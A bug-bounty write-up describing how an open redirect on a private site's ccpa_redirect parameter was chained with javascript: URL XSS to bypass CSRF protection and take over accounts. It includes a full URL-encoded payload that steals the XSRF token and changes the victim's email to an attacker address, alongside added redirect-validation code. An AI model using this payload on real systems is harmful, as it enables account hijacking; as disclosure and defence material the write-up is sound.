Chaining Open Redirect with XSS to Account Takeover

Hello everyone, I hope you are well. In this article I will show you how I escalated an XSS to an Account Takeover. Since the target is private, let's call it target.com.

The Open Redirect

I started testing the target and registered an account. During registration, I could create my own subdomain for the organization, like ownsubdomain.target.com. Then I logged in to the dashboard. Not long after, I found a URL endpoint like this: https://ownsubdomain.target.com/overview/?ccpa_redirect=

URL Endpoint

Then I tried an open redirect like this: https://ownsubdomain.target.com/overview/?ccpa_redirect=https://evil.com and it worked; I was redirected to the evil.com page :D. Since the parameter accepted any URL, I then tried the XSS payload javascript:alert(1); as the redirect value, opened it in the browser, and yeah, the XSS popped up.
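The root cause here is that ccpa_redirect is used as a navigation target without any validation, so both an external https URL and a javascript: URL go straight through. Below is an added example of how the redirect parameter could be validated before use; it is not code from the original post or from target.com, and it assumes the application and its customer subdomains live under the apex domain target.com.

```javascript
// Added example, not code from the original post or from target.com.
// Validates a redirect parameter such as ccpa_redirect before it is used
// in a Location header or in a client-side navigation.
const ALLOWED_APEX = 'target.com'; // assumption: apex domain of the application

function safeRedirectTarget(raw, currentOrigin) {
  if (typeof raw !== 'string' || raw.length === 0 || raw.length > 2048) {
    return null;
  }
  // The WHATWG URL parser silently strips tabs, newlines and surrounding
  // whitespace, so "java\tscript:" would still parse as a javascript: URL.
  // Reject any control character or space up front instead of trimming.
  if (/[\u0000-\u0020\u007f]/.test(raw)) {
    return null;
  }
  let parsed;
  try {
    // Relative paths ("/overview/") resolve against the current origin;
    // absolute inputs ("https://evil.com", "javascript:...", "//evil.com")
    // keep their own scheme and host, which the checks below inspect.
    parsed = new URL(raw, currentOrigin);
  } catch (_) {
    return null; // unparseable input is rejected, never passed through
  }
  // Scheme allowlist: comparing the parsed scheme rejects javascript:,
  // data:, file: and plain http:, and is safer than a string prefix check.
  if (parsed.protocol !== 'https:') {
    return null;
  }
  // Host allowlist: the apex domain or one of its subdomains. The leading
  // dot in the suffix stops "target.com.evil.com" and "nottarget.com".
  const host = parsed.hostname.toLowerCase();
  if (host !== ALLOWED_APEX && !host.endsWith('.' + ALLOWED_APEX)) {
    return null;
  }
  // Userinfo tricks ("https://target.com@evil.com") are already caught by
  // the host check, but refuse credentials in the authority explicitly.
  if (parsed.username || parsed.password) {
    return null;
  }
  // Hand back the normalised absolute URL, never the raw input.
  return parsed.href;
}
```

Anything that returns null should fall back to a fixed in-app page, and logging those rejections gives a cheap detection signal for redirect abuse attempts.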

Chaining the XSS to Account Takeover

After that, I didn't immediately report the bug. I was thinking of upgrading this XSS to a more severe impact. Shortly after, I found a form that can change my email, like this:

Form Change Email

But there was CSRF-token protection. Then I remembered that I had read a writeup about chaining XSS to a more severe impact. So, I built a payload to change my email and bypassed the CSRF-token protection using the XSS vulnerability: because the script runs on the application's own origin, it can read the XSRF-TOKEN cookie and send it back in the X-Xsrf-Token header. The payload was like this:

javascript:var%20http=new%20XMLHttpRequest();%20http.open(%27POST%27,%27https://ownsubdomain.target.com/api/3/settings/account%27,%20true);var%20csrf=%20document.cookie.split(%27;%20%27).find(row%20=%253e%20row.startsWith(%27XSRF-TOKEN%27)).split(%27=%27)[1];http.setRequestHeader(%27X-Xsrf-Token%27,csrf);http.withCredentials=true;http.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);http.send(%27firstName=Hacked%2526lastName=byHacker%2526loginEmail=attacker@mail.com%26phoneNumber=%2526notificationEmail=attacker@mail.com%2526signature=%2526timezone=Asia/Jakarta%2526language=english%27);alert('email%20changed');

So, when I visited this URL https://ownsubdomain.target.com/overview/?ccpa_redirect=javascript:var%20http=new%20XMLHttpRequest();%20http.open(%27POST%27,%27https://subdomain.target.com/api/3/settings/account%27,%20true);var%20csrf=%20document.cookie.split(%27;%20%27).find(row%20=%253e%20row.startsWith(%27XSRF-TOKEN%27)).split(%27=%27)[1];http.setRequestHeader(%27X-Xsrf-Token%27,csrf);http.withCredentials=true;http.setRequestHeader(%27Content-type%27,%27application/x-www-form-urlencoded%27);http.send(%27firstName=Hacked%2526lastName=byHacker%2526loginEmail=attacker@mail.com%26phoneNumber=%2526notificationEmail=attacker@mail.com%2526signature=%2526timezone=Asia/Jakarta%2526language=english%27);alert('email%20changed'); in the browser, the alert popped up and the email was changed.

Alert Popped Up
Email Changed Successfully

Then I reported this to the program, but it was marked as a duplicate :(

I hope you enjoyed my writeup. Keep learning and stay safe.

Tips:

Don’t be quick to report any bugs you find, always look for more severe impacts.

Radian ID